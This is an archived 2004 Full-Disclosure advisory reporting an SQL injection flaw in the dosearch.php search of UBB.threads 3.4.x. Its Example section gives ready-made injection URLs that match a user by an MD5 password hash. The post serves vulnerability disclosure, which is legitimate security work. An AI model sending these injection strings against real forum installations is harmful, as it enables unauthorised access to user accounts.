|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[Full-Disclosure] SQL Injection in UBB.threads 3.4.x
From: Florian Rock (florianrock
web.de)
Date: Thu Oct 21 2004 - 15:35:24 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Product:
========
UBB.threads
Vendor:
=======
UBBCentral (http://www.ubbcentral.com/)
Versions:
=========
I tested it successfull on 3.4.x
At Version 3.5 you need to be logged in to perform a search. I didnt tested
this version.
Problem:
========
Sql-Injection in dosearch.php
dosearch.php?Name=' OR U_Password='PWINMD5
Impact:
=======
A remote user can inject SQL commands
Example:
========
db5c82346d770f48bdd8929094c0c695 (ubbpass)
/dosearch.php?Name=' OR U_Password='db5c82346d770f48bdd8929094c0c695
OR
/dosearch.php?Name=' OR U_Password='db5c82346d770f48bdd8929094c0c695'/*
-> selects a user who got "ubbpass" as password.
Greets fly out to:
==================
felx, zodiac, nostalg1c, chris, lexxor, haggi, li, xlr, rest of p32,
peti, danjo, milch_trinker, hecky, and all i forgot
Greets
Florian Rock aka Remoter
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]